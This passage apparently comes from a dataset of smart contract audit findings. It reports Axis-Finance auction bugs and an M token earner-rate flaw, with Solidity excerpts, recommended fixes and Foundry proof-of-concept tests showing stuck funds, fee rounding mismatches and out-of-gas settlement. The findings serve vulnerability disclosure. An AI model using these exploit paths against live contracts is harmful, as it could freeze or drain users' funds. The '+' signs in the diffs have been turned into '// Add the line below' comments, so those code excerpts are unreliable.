USDC) and bidder's account gets blacklisted after the bid was submitted, the settlement would be bricked and all bidders and the seller would lose their tokens/proceeds.\\nIn the `AuctionHouse.settlement()` function there is a check if the bid was partially filled, in which case the function handles refund and payout immediately:\\n```\\n // Check if there was a partial fill and handle the payout + refund\\n if (settlement.pfBidder != address(0)) {\\n // Allocate quote and protocol fees for bid\\n _allocateQuoteFees(\\n feeData.protocolFee,\\n feeData.referrerFee,\\n settlement.pfReferrer,\\n routing.seller,\\n routing.quoteToken,\\n // Reconstruct bid amount from the settlement price and the amount out\\n uint96(\\n Math.mulDivDown(\\n settlement.pfPayout, settlement.totalIn, settlement.totalOut\\n )\\n )\\n );\\n\\n // Reduce funding by the payout amount\\n unchecked {\\n routing.funding -= uint96(settlement.pfPayout);\\n }\\n\\n // Send refund and payout to the bidder\\n //@audit if pfBidder gets blacklisted the settlement is broken\\n Transfer.transfer(\\n routing.quoteToken, settlement.pfBidder, settlement.pfRefund, false\\n );\\n\\n _sendPayout(settlement.pfBidder, settlement.pfPayout, routing, auctionOutput);\\n }\\n```\\n\\nIf `pfBidder` gets blacklisted after he submitted his bid, the call to `settle()` would revert. 
There is no way for other bidders to get a refund for the auction since settlement can only happen after auction conclusion but the `refundBid()` function needs to be called before the conclusion:\\n```\\n function settle(uint96 lotId_)\\n external\\n virtual\\n override\\n onlyInternal\\n returns (Settlement memory settlement, bytes memory auctionOutput)\\n {\\n // Standard validation\\n _revertIfLotInvalid(lotId_);\\n _revertIfBeforeLotStart(lotId_);\\n _revertIfLotActive(lotId_); //@audit\\n _revertIfLotSettled(lotId_);\\n \\n // rest of code\\n}\\n```\\n\\n```\\n function refundBid(\\n uint96 lotId_,\\n uint64 bidId_,\\n address caller_\\n ) external override onlyInternal returns (uint96 refund) {\\n // Standard validation\\n _revertIfLotInvalid(lotId_);\\n _revertIfBeforeLotStart(lotId_);\\n _revertIfBidInvalid(lotId_, bidId_);\\n _revertIfNotBidOwner(lotId_, bidId_, caller_);\\n _revertIfBidClaimed(lotId_, bidId_);\\n _revertIfLotConcluded(lotId_); //@audit\\n\\n // Call implementation-specific logic\\n return _refundBid(lotId_, bidId_, caller_);\\n }\\n```\\n\\nAlso, the `claimBids` function would also revert since the lot wasn't settled and the seller wouldn't be able to get his prefunding back since he can neither `cancel()` the lot nor `claimProceeds()`.",Separate the payout and refunding logic for pfBidder from the settlement process.,Loss of funds,"```\\n // Check if there was a partial fill and handle the payout + refund\\n if (settlement.pfBidder != address(0)) {\\n // Allocate quote and protocol fees for bid\\n _allocateQuoteFees(\\n feeData.protocolFee,\\n feeData.referrerFee,\\n settlement.pfReferrer,\\n routing.seller,\\n routing.quoteToken,\\n // Reconstruct bid amount from the settlement price and the amount out\\n uint96(\\n Math.mulDivDown(\\n settlement.pfPayout, settlement.totalIn, settlement.totalOut\\n )\\n )\\n );\\n\\n // Reduce funding by the payout amount\\n unchecked {\\n routing.funding -= uint96(settlement.pfPayout);\\n }\\n\\n // 
Send refund and payout to the bidder\\n //@audit if pfBidder gets blacklisted the settlement is broken\\n Transfer.transfer(\\n routing.quoteToken, settlement.pfBidder, settlement.pfRefund, false\\n );\\n\\n _sendPayout(settlement.pfBidder, settlement.pfPayout, routing, auctionOutput);\\n }\\n```\\n" +"Unsold tokens from a FPAM auction, will be stuck in the protocol, after the auction concludes",medium,"The `Axis-Finance` protocol allows sellers to create two types of auctions: FPAM & EMPAM. An FPAM auction allows sellers to set a price, and a maxPayout, as well as create a prefunded auction. The seller of a FPAM auction can cancel it while it is still active by calling the cancel function which in turn calls the cancelAuction() function. If the auction is prefunded, and canceled while still active, all remaining funds will be transferred back to the seller. The problem arises if an FPAM prefunded auction is created, not all of the prefunded supply is bought by users, and the auction concludes. There is no way for the `baseTokens` still in the contract, to be withdrawn from the protocol, and they will be forever stuck in the `Axis-Finance` protocol. 
As can be seen from the below code snippet cancelAuction() function checks if an auction is concluded, and if it is the function reverts.\\n```\\n function _revertIfLotConcluded(uint96 lotId_) internal view virtual {\\n // Beyond the conclusion time\\n if (lotData[lotId_].conclusion < uint48(block.timestamp)) {\\n revert Auction_MarketNotActive(lotId_);\\n }\\n\\n // Capacity is sold-out, or cancelled\\n if (lotData[lotId_].capacity == 0) revert Auction_MarketNotActive(lotId_);\\n }\\n```\\n\\nGist After following the steps in the above mentioned gist add the following test to the `AuditorTests.t.sol` file\\n```\\nfunction test_FundedPriceAuctionStuckFunds() public {\\n vm.startPrank(alice);\\n Veecode veecode = fixedPriceAuctionModule.VEECODE();\\n Keycode keycode = keycodeFromVeecode(veecode);\\n bytes memory _derivativeParams = """";\\n uint96 lotCapacity = 75_000_000_000e18; // this is 75 billion tokens\\n mockBaseToken.mint(alice, lotCapacity);\\n mockBaseToken.approve(address(auctionHouse), type(uint256).max);\\n\\n FixedPriceAuctionModule.FixedPriceParams memory myStruct = FixedPriceAuctionModule.FixedPriceParams({\\n price: uint96(1e18), \\n maxPayoutPercent: uint24(1e5)\\n });\\n\\n Auctioneer.RoutingParams memory routingA = Auctioneer.RoutingParams({\\n auctionType: keycode,\\n baseToken: mockBaseToken,\\n quoteToken: mockQuoteToken,\\n curator: curator,\\n callbacks: ICallback(address(0)),\\n callbackData: abi.encode(""""),\\n derivativeType: toKeycode(""""),\\n derivativeParams: _derivativeParams,\\n wrapDerivative: false,\\n prefunded: true\\n });\\n\\n Auction.AuctionParams memory paramsA = Auction.AuctionParams({\\n start: 0,\\n duration: 1 days,\\n capacityInQuote: false,\\n capacity: lotCapacity,\\n implParams: abi.encode(myStruct)\\n });\\n\\n string memory infoHashA;\\n auctionHouse.auction(routingA, paramsA, infoHashA); \\n vm.stopPrank();\\n\\n vm.startPrank(bob);\\n uint96 fundingBeforePurchase;\\n uint96 fundingAfterPurchase;\\n 
(,fundingBeforePurchase,,,,,,,) = auctionHouse.lotRouting(0);\\n console2.log(""Here is the funding normalized before purchase: "", fundingBeforePurchase/1e18);\\n mockQuoteToken.mint(bob, 10_000_000_000e18);\\n mockQuoteToken.approve(address(auctionHouse), type(uint256).max);\\n Router.PurchaseParams memory purchaseParams = Router.PurchaseParams({\\n recipient: bob,\\n referrer: address(0),\\n lotId: 0,\\n amount: 10_000_000_000e18,\\n minAmountOut: 10_000_000_000e18,\\n auctionData: abi.encode(0),\\n permit2Data: """"\\n });\\n bytes memory callbackData = """";\\n auctionHouse.purchase(purchaseParams, callbackData);\\n (,fundingAfterPurchase,,,,,,,) = auctionHouse.lotRouting(0);\\n console2.log(""Here is the funding normalized after purchase: "", fundingAfterPurchase/1e18);\\n console2.log(""Balance of seler of quote tokens: "", mockQuoteToken.balanceOf(alice)/1e18);\\n console2.log(""Balance of bob in base token: "", mockBaseToken.balanceOf(bob)/1e18);\\n console2.log(""Balance of auction house in base token: "", mockBaseToken.balanceOf(address(auctionHouse)) /1e18);\\n skip(86401);\\n vm.stopPrank();\\n\\n vm.startPrank(alice);\\n vm.expectRevert(\\n abi.encodeWithSelector(Auction.Auction_MarketNotActive.selector, 0)\\n );\\n auctionHouse.cancel(uint96(0), callbackData);\\n vm.stopPrank();\\n }\\n```\\n\\n```\\nLogs:\\n Here is the funding normalized before purchase: 75000000000\\n Here is the funding normalized after purchase: 65000000000\\n Balance of seler of quote tokens: 10000000000\\n Balance of bob in base token: 10000000000\\n Balance of auction house in base token: 65000000000\\n```\\n\\nTo run the test use: `forge test -vvv --mt test_FundedPriceAuctionStuckFunds`","Implement a function, that allows sellers to withdraw the amount left for a prefunded FPAM auction they have created, once the auction has concluded.","If a prefunded FPAM auction concludes and there are still tokens, not bought from the users, they will be stuck in the `Axis-Finance` 
protocol.","```\\n function _revertIfLotConcluded(uint96 lotId_) internal view virtual {\\n // Beyond the conclusion time\\n if (lotData[lotId_].conclusion < uint48(block.timestamp)) {\\n revert Auction_MarketNotActive(lotId_);\\n }\\n\\n // Capacity is sold-out, or cancelled\\n if (lotData[lotId_].capacity == 0) revert Auction_MarketNotActive(lotId_);\\n }\\n```\\n" +User's can be grieved by not submitting the private key,medium,"User's can be grieved by not submitting the private key\\nBids cannot be refunded once the auction concludes. And bids cannot be claimed until the auction has been settled. Similarly a EMPAM auction cannot be cancelled once started.\\n```\\n function claimBids(\\n uint96 lotId_,\\n uint64[] calldata bidIds_\\n )\\n external\\n override\\n onlyInternal\\n returns (BidClaim[] memory bidClaims, bytes memory auctionOutput)\\n {\\n // Standard validation\\n _revertIfLotInvalid(lotId_);\\n _revertIfLotNotSettled(lotId_);\\n```\\n\\n```\\n function refundBid(\\n uint96 lotId_,\\n uint64 bidId_,\\n address caller_\\n ) external override onlyInternal returns (uint96 refund) {\\n // Standard validation\\n _revertIfLotInvalid(lotId_);\\n _revertIfBeforeLotStart(lotId_);\\n _revertIfBidInvalid(lotId_, bidId_);\\n _revertIfNotBidOwner(lotId_, bidId_, caller_);\\n _revertIfBidClaimed(lotId_, bidId_);\\n _revertIfLotConcluded(lotId_);\\n```\\n\\n```\\n function _cancelAuction(uint96 lotId_) internal override {\\n // Validation\\n // Batch auctions cannot be cancelled once started, otherwise the seller could cancel the auction after bids have been submitted\\n _revertIfLotActive(lotId_);\\n```\\n\\n```\\n function cancelAuction(uint96 lotId_) external override onlyInternal {\\n // Validation\\n _revertIfLotInvalid(lotId_);\\n _revertIfLotConcluded(lotId_);\\n```\\n\\n```\\n function _settle(uint96 lotId_)\\n internal\\n override\\n returns (Settlement memory settlement_, bytes memory auctionOutput_)\\n {\\n // Settle the auction\\n // Check that auction 
is in the right state for settlement\\n if (auctionData[lotId_].status != Auction.Status.Decrypted) {\\n revert Auction_WrongState(lotId_);\\n }\\n```\\n\\nFor EMPAM auctions, the private key associated with the auction has to be submitted before the auction can be settled. In auctions where the private key is held by the seller, they can grief the bidders, or in cases where a key management solution is used, both the seller and the bidders can be griefed by not submitting the private key.",Acknowledge the risk involved for the seller and bidder,Users will not be able to claim their assets in case the private key holder doesn't submit the key for decryption,"```\\n function claimBids(\\n uint96 lotId_,\\n uint64[] calldata bidIds_\\n )\\n external\\n override\\n onlyInternal\\n returns (BidClaim[] memory bidClaims, bytes memory auctionOutput)\\n {\\n // Standard validation\\n _revertIfLotInvalid(lotId_);\\n _revertIfLotNotSettled(lotId_);\\n```\\n" +Bidders' payout claims could fail due to validation checks in LinearVesting,medium,"Bidders' payout claims will fail due to validation checks in LinearVesting after the expiry timestamp\\nBidders' payouts are sent by internally calling the `_sendPayout` function. 
In case the payout is a derivative which has already expired, this will revert due to the validation check of `block.timestmap < expiry` present in the mint function of LinearVesting derivative\\n```\\n function _sendPayout(\\n address recipient_,\\n uint256 payoutAmount_,\\n Routing memory routingParams_,\\n bytes memory\\n ) internal {\\n \\n if (fromVeecode(derivativeReference) == bytes7("""")) {\\n Transfer.transfer(baseToken, recipient_, payoutAmount_, true);\\n }\\n else {\\n \\n DerivativeModule module = DerivativeModule(_getModuleIfInstalled(derivativeReference));\\n\\n Transfer.approve(baseToken, address(module), payoutAmount_);\\n\\n=> module.mint(\\n recipient_,\\n address(baseToken),\\n routingParams_.derivativeParams,\\n payoutAmount_,\\n routingParams_.wrapDerivative\\n );\\n```\\n\\n```\\n function mint(\\n address to_,\\n address underlyingToken_,\\n bytes memory params_,\\n uint256 amount_,\\n bool wrapped_\\n )\\n external\\n virtual\\n override\\n returns (uint256 tokenId_, address wrappedAddress_, uint256 amountCreated_)\\n {\\n if (amount_ == 0) revert InvalidParams();\\n\\n VestingParams memory params = _decodeVestingParams(params_);\\n\\n if (_validate(underlyingToken_, params) == false) {\\n revert InvalidParams();\\n }\\n```\\n\\n```\\n function _validate(\\n address underlyingToken_,\\n VestingParams memory data_\\n ) internal view returns (bool) {\\n \\n // rest of code.\\n\\n=> if (data_.expiry < block.timestamp) return false;\\n\\n\\n // Check that the underlying token is not 0\\n if (underlyingToken_ == address(0)) return false;\\n\\n\\n return true;\\n }\\n```\\n\\nHence the user's won't be able to claim their payouts of an auction once the derivative has expired. 
For EMPAM auctions, a seller can also wait till this timestamp passes before revealing their private key which will disallow bidders from claiming their rewards.","Allow minting tokens even after expiry of the vesting token / deploy the derivative token first itself and when making the payout, transfer the base token directly in case the expiry time is passed",Bidders won't be able to claim payouts from an auction after the derivative expiry timestamp,"```\\n function _sendPayout(\\n address recipient_,\\n uint256 payoutAmount_,\\n Routing memory routingParams_,\\n bytes memory\\n ) internal {\\n \\n if (fromVeecode(derivativeReference) == bytes7("""")) {\\n Transfer.transfer(baseToken, recipient_, payoutAmount_, true);\\n }\\n else {\\n \\n DerivativeModule module = DerivativeModule(_getModuleIfInstalled(derivativeReference));\\n\\n Transfer.approve(baseToken, address(module), payoutAmount_);\\n\\n=> module.mint(\\n recipient_,\\n address(baseToken),\\n routingParams_.derivativeParams,\\n payoutAmount_,\\n routingParams_.wrapDerivative\\n );\\n```\\n" +Inaccurate value is used for partial fill quote amount when calculating fees,medium,"Inaccurate value is used for partial fill quote amount when calculating fees which can cause reward claiming / payment withdrawal to revert\\nThe fees of an auction are managed as follows:\\nWhenever a bidder claims their payout, calculate the amount of quote tokens that should be collected as fees (instead of giving the entire quote amount to the seller) and add this to the protocol / referrers rewards\\n```\\n function claimBids(uint96 lotId_, uint64[] calldata bidIds_) external override nonReentrant {\\n \\n // rest of code.\\n\\n for (uint256 i = 0; i < bidClaimsLen; i++) {\\n Auction.BidClaim memory bidClaim = bidClaims[i];\\n\\n if (bidClaim.payout > 0) {\\n \\n=> _allocateQuoteFees(\\n protocolFee,\\n referrerFee,\\n bidClaim.referrer,\\n routing.seller,\\n routing.quoteToken,\\n=> bidClaim.paid\\n );\\n```\\n\\nHere bidClaim.paid 
is the amount of quote tokens that was transferred in by the bidder for the purchase\\n```\\n function _allocateQuoteFees(\\n uint96 protocolFee_,\\n uint96 referrerFee_,\\n address referrer_,\\n address seller_,\\n ERC20 quoteToken_,\\n uint96 amount_\\n ) internal returns (uint96 totalFees) {\\n // Calculate fees for purchase\\n (uint96 toReferrer, uint96 toProtocol) = calculateQuoteFees(\\n protocolFee_, referrerFee_, referrer_ != address(0) && referrer_ != seller_, amount_\\n );\\n\\n // Update fee balances if non-zero\\n if (toReferrer > 0) rewards[referrer_][quoteToken_] += uint256(toReferrer);\\n if (toProtocol > 0) rewards[_protocol][quoteToken_] += uint256(toProtocol);\\n\\n\\n return toReferrer + toProtocol;\\n }\\n```\\n\\nWhenever the seller calls claimProceeds to withdraw the amount of quote tokens received from the auction, subtract the quote fees and give out the remaining\\n```\\n function claimProceeds(\\n uint96 lotId_,\\n bytes calldata callbackData_\\n ) external override nonReentrant {\\n \\n // rest of code.\\n \\n uint96 totalInLessFees;\\n {\\n=> (, uint96 toProtocol) = calculateQuoteFees(\\n lotFees[lotId_].protocolFee, lotFees[lotId_].referrerFee, false, purchased_\\n );\\n unchecked {\\n=> totalInLessFees = purchased_ - toProtocol;\\n }\\n }\\n```\\n\\nHere purchased is the total quote token amount that was collected for this auction.\\nIn case the fees calculated in claimProceeds is less than the sum of fees allocated to the protocol / referrer via claimBids, there will be a mismatch causing the sum of (fees allocated + seller purchased quote tokens) to be greater than the total quote token amount that was transferred in for the auction. 
This could cause either the protocol/referrer to not obtain their rewards or the seller to not be able to claim the purchased tokens in case there are no excess quote token present in the auction house contract.\\nIn case, totalPurchased is >= sum of all individual bid quote token amounts (as it is supposed to be), the fee allocation would be correct. But due to the inaccurate computation of the input quote token amount associated with a partial fill, it is possible for the above scenario (ie. fees calculated in claimProceeds is less than the sum of fees allocated to the protocol / referrer via claimBids) to occur\\n```\\n function settle(uint96 lotId_) external override nonReentrant {\\n \\n // rest of code.\\n\\n if (settlement.pfBidder != address(0)) {\\n\\n _allocateQuoteFees(\\n feeData.protocolFee,\\n feeData.referrerFee,\\n settlement.pfReferrer,\\n routing.seller,\\n routing.quoteToken,\\n\\n // @audit this method of calculating the input quote token amount associated with a partial fill is not accurate\\n uint96(\\n=> Math.mulDivDown(\\n settlement.pfPayout, settlement.totalIn, settlement.totalOut\\n )\\n )\\n```\\n\\nThe above method of calculating the input token amount associated with a partial fill can cause this value to be higher than the acutal value and hence the fees allocated will be less than what the fees that will be captured from the seller will be\\nPOC\\nApply the following diff to `test/AuctionHouse/AuctionHouseTest.sol` and run `forge test --mt testHash_SpecificPartialRounding -vv`\\nIt is asserted that the tokens allocated as fees is greater than the tokens that will be captured from a seller for fees\\n```\\ndiff --git a/moonraker/test/AuctionHouse/AuctionHouseTest.sol b/moonraker/test/AuctionHouse/AuctionHouseTest.sol\\nindex 44e717d..9b32834 100644\\n--- a/moonraker/test/AuctionHouse/AuctionHouseTest.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/moonraker/test/AuctionHouse/AuctionHouseTest.sol\\n@@ 
-6,6 // Add the line below\\n6,8 @@ import {Test} from ""forge-std/Test.sol"";\\n import {ERC20} from ""solmate/tokens/ERC20.sol"";\\n import {Transfer} from ""src/lib/Transfer.sol"";\\n import {FixedPointMathLib} from ""solmate/utils/FixedPointMathLib.sol"";\\n// Add the line below\\nimport {SafeCastLib} from ""solmate/utils/SafeCastLib.sol"";\\n// Add the line below\\n\\n \\n // Mocks\\n import {MockAtomicAuctionModule} from ""test/modules/Auction/MockAtomicAuctionModule.sol"";\\n@@ -134,6 // Add the line below\\n136,158 @@ abstract contract AuctionHouseTest is Test, Permit2User {\\n _bidder = vm.addr(_bidderKey);\\n }\\n \\n// Add the line below\\n function testHash_SpecificPartialRounding() public {\\n// Add the line below\\n /*\\n// Add the line below\\n capacity 1056499719758481066\\n// Add the line below\\n previous total amount 1000000000000000000\\n// Add the line below\\n bid amount 2999999999999999999997\\n// Add the line below\\n price 2556460687578254783645\\n// Add the line below\\n fullFill 1173497411705521567\\n// Add the line below\\n excess 117388857750942341\\n// Add the line below\\n pfPayout 1056108553954579226\\n// Add the line below\\n pfRefund 300100000000000000633\\n// Add the line below\\n new totalAmountIn 2700899999999999999364\\n// Add the line below\\n usedContributionForQuoteFees 2699900000000000000698\\n// Add the line below\\n quoteTokens1 1000000\\n// Add the line below\\n quoteTokens2 2699900000\\n// Add the line below\\n quoteTokensAllocated 2700899999\\n// Add the line below\\n */\\n// Add the line below\\n\\n// Add the line below\\n uint bidAmount = 2999999999999999999997;\\n// Add the line below\\n uint marginalPrice = 2556460687578254783645;\\n// Add the line below\\n uint capacity = 1056499719758481066;\\n// Add the line below\\n uint previousTotalAmount = 1000000000000000000;\\n// Add the line below\\n uint baseScale = 1e18;\\n// Add the line below\\n\\n// Add the line below\\n // hasn't reached the capacity with 
previousTotalAmount\\n// Add the line below\\n assert(\\n// Add the line below\\n FixedPointMathLib.mulDivDown(previousTotalAmount, baseScale, marginalPrice) <\\n// Add the line below\\n capacity\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n uint capacityExpended = FixedPointMathLib.mulDivDown(\\n// Add the line below\\n previousTotalAmount // Add the line below\\n bidAmount,\\n// Add the line below\\n baseScale,\\n// Add the line below\\n marginalPrice\\n// Add the line below\\n );\\n// Add the line below\\n assert(capacityExpended > capacity);\\n// Add the line below\\n\\n// Add the line below\\n uint totalAmountIn = previousTotalAmount // Add the line below\\n bidAmount;\\n// Add the line below\\n\\n// Add the line below\\n uint256 fullFill = FixedPointMathLib.mulDivDown(\\n// Add the line below\\n uint256(bidAmount),\\n// Add the line below\\n baseScale,\\n// Add the line below\\n marginalPrice\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n uint256 excess = capacityExpended - capacity;\\n// Add the line below\\n\\n// Add the line below\\n uint pfPayout = SafeCastLib.safeCastTo96(fullFill - excess);\\n// Add the line below\\n uint pfRefund = SafeCastLib.safeCastTo96(\\n// Add the line below\\n FixedPointMathLib.mulDivDown(uint256(bidAmount), excess, fullFill)\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n totalAmountIn -= pfRefund;\\n// Add the line below\\n\\n// Add the line below\\n uint usedContributionForQuoteFees;\\n// Add the line below\\n {\\n// Add the line below\\n uint totalOut = SafeCastLib.safeCastTo96(\\n// Add the line below\\n capacityExpended > capacity ? 
capacity : capacityExpended\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n usedContributionForQuoteFees = FixedPointMathLib.mulDivDown(\\n// Add the line below\\n pfPayout,\\n// Add the line below\\n totalAmountIn,\\n// Add the line below\\n totalOut\\n// Add the line below\\n );\\n// Add the line below\\n }\\n// Add the line below\\n\\n// Add the line below\\n {\\n// Add the line below\\n uint actualContribution = bidAmount - pfRefund;\\n// Add the line below\\n\\n// Add the line below\\n // acutal contribution is less than the usedContributionForQuoteFees\\n// Add the line below\\n assert(actualContribution < usedContributionForQuoteFees);\\n// Add the line below\\n console2.log(""actual contribution"", actualContribution);\\n// Add the line below\\n console2.log(\\n// Add the line below\\n ""used contribution for fees"",\\n// Add the line below\\n usedContributionForQuoteFees\\n// Add the line below\\n );\\n// Add the line below\\n }\\n// Add the line below\\n\\n// Add the line below\\n // calculating quote fees allocation\\n// Add the line below\\n // quote fees captured from the seller\\n// Add the line below\\n {\\n// Add the line below\\n (, uint96 quoteTokensAllocated) = calculateQuoteFees(\\n// Add the line below\\n 1e3,\\n// Add the line below\\n 0,\\n// Add the line below\\n false,\\n// Add the line below\\n SafeCastLib.safeCastTo96(totalAmountIn)\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n // quote tokens that will be allocated for the earlier bid\\n// Add the line below\\n (, uint96 quoteTokens1) = calculateQuoteFees(\\n// Add the line below\\n 1e3,\\n// Add the line below\\n 0,\\n// Add the line below\\n false,\\n// Add the line below\\n SafeCastLib.safeCastTo96(previousTotalAmount)\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n // quote tokens that will be allocated for the partial fill\\n// Add the line below\\n (, uint96 quoteTokens2) = 
calculateQuoteFees(\\n// Add the line below\\n 1e3,\\n// Add the line below\\n 0,\\n// Add the line below\\n false,\\n// Add the line below\\n SafeCastLib.safeCastTo96(usedContributionForQuoteFees)\\n// Add the line below\\n );\\n// Add the line below\\n \\n// Add the line below\\n console2.log(""quoteTokens1"", quoteTokens1);\\n// Add the line below\\n console2.log(""quoteTokens2"", quoteTokens2);\\n// Add the line below\\n console2.log(""quoteTokensAllocated"", quoteTokensAllocated);\\n// Add the line below\\n\\n// Add the line below\\n // quoteToken fees allocated is greater than what will be captured from seller\\n// Add the line below\\n assert(quoteTokens1 // Add the line below\\n quoteTokens2 > quoteTokensAllocated);\\n// Add the line below\\n }\\n// Add the line below\\n }\\n// Add the line below\\n\\n// Add the line below\\n function calculateQuoteFees(\\n// Add the line below\\n uint96 protocolFee_,\\n// Add the line below\\n uint96 referrerFee_,\\n// Add the line below\\n bool hasReferrer_,\\n// Add the line below\\n uint96 amount_\\n// Add the line below\\n ) public pure returns (uint96 toReferrer, uint96 toProtocol) {\\n// Add the line below\\n uint _FEE_DECIMALS = 5;\\n// Add the line below\\n uint96 feeDecimals = uint96(_FEE_DECIMALS);\\n// Add the line below\\n\\n// Add the line below\\n if (hasReferrer_) {\\n// Add the line below\\n // In this case we need to:\\n// Add the line below\\n // 1. Calculate referrer fee\\n// Add the line below\\n // 2. 
Calculate protocol fee as the total expected fee amount minus the referrer fee\\n// Add the line below\\n // to avoid issues with rounding from separate fee calculations\\n// Add the line below\\n toReferrer = uint96(\\n// Add the line below\\n FixedPointMathLib.mulDivDown(amount_, referrerFee_, feeDecimals)\\n// Add the line below\\n );\\n// Add the line below\\n toProtocol =\\n// Add the line below\\n uint96(\\n// Add the line below\\n FixedPointMathLib.mulDivDown(\\n// Add the line below\\n amount_,\\n// Add the line below\\n protocolFee_ // Add the line below\\n referrerFee_,\\n// Add the line below\\n feeDecimals\\n// Add the line below\\n )\\n// Add the line below\\n ) -\\n// Add the line below\\n toReferrer;\\n// Add the line below\\n } else {\\n// Add the line below\\n // If there is no referrer, the protocol gets the entire fee\\n// Add the line below\\n toProtocol = uint96(\\n// Add the line below\\n FixedPointMathLib.mulDivDown(\\n// Add the line below\\n amount_,\\n// Add the line below\\n protocolFee_ // Add the line below\\n referrerFee_,\\n// Add the line below\\n feeDecimals\\n// Add the line below\\n )\\n// Add the line below\\n );\\n// Add the line below\\n }\\n// Add the line below\\n }\\n// Add the line below\\n\\n// Add the line below\\n\\n // ===== Helper Functions ===== //\\n \\n function _mulDivUp(uint96 mul1_, uint96 mul2_, uint96 div_) internal pure returns (uint96) {\\n```\\n",Use `bidAmount - pfRefund` as the quote token input amount value instead of computing the current way,Rewards might not be collectible or seller might not be able to claim the proceeds due to lack of tokens,"```\\n function claimBids(uint96 lotId_, uint64[] calldata bidIds_) external override nonReentrant {\\n \\n // rest of code.\\n\\n for (uint256 i = 0; i < bidClaimsLen; i++) {\\n Auction.BidClaim memory bidClaim = bidClaims[i];\\n\\n if (bidClaim.payout > 0) {\\n \\n=> _allocateQuoteFees(\\n protocolFee,\\n referrerFee,\\n bidClaim.referrer,\\n 
routing.seller,\\n routing.quoteToken,\\n=> bidClaim.paid\\n );\\n```\\n" +Settlement of batch auction can exceed the gas limit,medium,"Settlement of batch auction can exceed the gas limit, making it impossible to settle the auction.\\nWhen a batch auction (EMPAM) is settled, to calculate the lot marginal price, the contract iterates over all bids until the capacity is reached or a bid below the minimum price is found.\\nAs some of the operations performed in the loop are gas-intensive, the contract may run out of gas if the number of bids is too high.\\nNote that additionally, there is another loop in the `_settle` function that iterates over all the remaining bids to delete them from the queue. While this loop consumes much less gas per iteration and would require the number of bids to be much higher to run out of gas, it adds to the problem.\\nChange the minimum bid percent to 0.1% in the `EmpaModuleTest` contract in `EMPAModuleTest.sol`.\\n```\\n// Remove the line below\\n uint24 internal constant _MIN_BID_PERCENT = 1000; // 1%\\n// Add the line below\\n uint24 internal constant _MIN_BID_PERCENT = 100; // 0.1%\\n```\\n\\nAdd the following code to the contract `EmpaModuleSettleTest` in `settle.t.sol` and run `forge test --mt test_settleOog`.\\n```\\nmodifier givenBidsCreated() {\\n uint96 amountOut = 0.01e18;\\n uint96 amountIn = 0.01e18;\\n uint256 numBids = 580;\\n\\n for (uint256 i = 0; i < numBids; i++) {\\n _createBid(_BIDDER, amountIn, amountOut);\\n }\\n \\n _;\\n}\\n\\nfunction test_settleOog() external\\n givenLotIsCreated\\n givenLotHasStarted\\n givenBidsCreated\\n givenLotHasConcluded\\n givenPrivateKeyIsSubmitted\\n givenLotIsDecrypted\\n{ \\n uint256 gasBefore = gasleft();\\n _settle();\\n\\n assert(gasBefore - gasleft() > 30_000_000);\\n}\\n```\\n","An easy way to tackle the issue would be to change the `_MIN_BID_PERCENT` value from 10 (0.01%) to 1000 (1%) in the `EMPAM.sol` contract, which would limit the number of iterations to 100.\\nA more 
appropriate solution, if it is not acceptable to increase the min bid percent, would be to change the settlement logic so that can be handled in batches of bids to avoid running out of gas.\\nIn both cases, it would also be recommended to limit the number of decrypted bids that can be deleted from the queue in a single transaction.","Settlement of batch auction will revert, causing sellers and bidders to lose their funds.",```\\n// Remove the line below\\n uint24 internal constant _MIN_BID_PERCENT = 1000; // 1%\\n// Add the line below\\n uint24 internal constant _MIN_BID_PERCENT = 100; // 0.1%\\n```\\n +An earner can still continue earning even after being removed from the approved list.,medium,"An earner can still continue earning even after being removed from the approved list.\\nA `M` holder is eligible to earn the `Earner Rate` when they are approved by TTG. The approved `M` holder can call `startEarning()` then begin to earn the `Earner Rate`. They also can `stopEarning()` to quit earning.\\nHowever, when an approved `M` holder is disapproved, only the disapproved holder themselves can choose to stop earning; no one else has the authority to force them to quit earning.\\n`Earner Rate` is calculated in `StableEarnerRateModel#rate()` as below:\\n```\\n function rate() external view returns (uint256) {\\n uint256 safeEarnerRate_ = getSafeEarnerRate(\\n IMinterGateway(minterGateway).totalActiveOwedM(),\\n IMToken(mToken).totalEarningSupply(),\\n IMinterGateway(minterGateway).minterRate()\\n );\\n\\n return UIntMath.min256(maxRate(), (RATE_MULTIPLIER * safeEarnerRate_) / ONE);\\n }\\n\\n function getSafeEarnerRate(\\n uint240 totalActiveOwedM_,\\n uint240 totalEarningSupply_,\\n uint32 minterRate_\\n ) public pure returns (uint32) {\\n // solhint-disable max-line-length\\n // When `totalActiveOwedM_ >= totalEarningSupply_`, it is possible for the earner rate to be higher than the\\n // minter rate and still ensure cashflow safety over some period of time 
(`RATE_CONFIDENCE_INTERVAL`). To ensure\\n // cashflow safety, we start with `cashFlowOfActiveOwedM >= cashFlowOfEarningSupply` over some time `dt`.\\n // Effectively: p1 * (exp(rate1 * dt) - 1) >= p2 * (exp(rate2 * dt) - 1)\\n // So: rate2 <= ln(1 + (p1 * (exp(rate1 * dt) - 1)) / p2) / dt\\n // 1. totalActive * (delta_minterIndex - 1) >= totalEarning * (delta_earnerIndex - 1)\\n // 2. totalActive * (delta_minterIndex - 1) / totalEarning >= delta_earnerIndex - 1\\n // 3. 1 + (totalActive * (delta_minterIndex - 1) / totalEarning) >= delta_earnerIndex\\n // Substitute `delta_earnerIndex` with `exponent((earnerRate * dt) / SECONDS_PER_YEAR)`:\\n // 4. 1 + (totalActive * (delta_minterIndex - 1) / totalEarning) >= exponent((earnerRate * dt) / SECONDS_PER_YEAR)\\n // 5. ln(1 + (totalActive * (delta_minterIndex - 1) / totalEarning)) >= (earnerRate * dt) / SECONDS_PER_YEAR\\n // 6. ln(1 + (totalActive * (delta_minterIndex - 1) / totalEarning)) * SECONDS_PER_YEAR / dt >= earnerRate\\n\\n // When `totalActiveOwedM_ < totalEarningSupply_`, the instantaneous earner cash flow must be less than the\\n // instantaneous minter cash flow. To ensure instantaneous cashflow safety, we we use the derivatives of the\\n // previous starting inequality, and substitute `dt = 0`.\\n // Effectively: p1 * rate1 >= p2 * rate2\\n // So: rate2 <= p1 * rate1 / p2\\n // 1. totalActive * 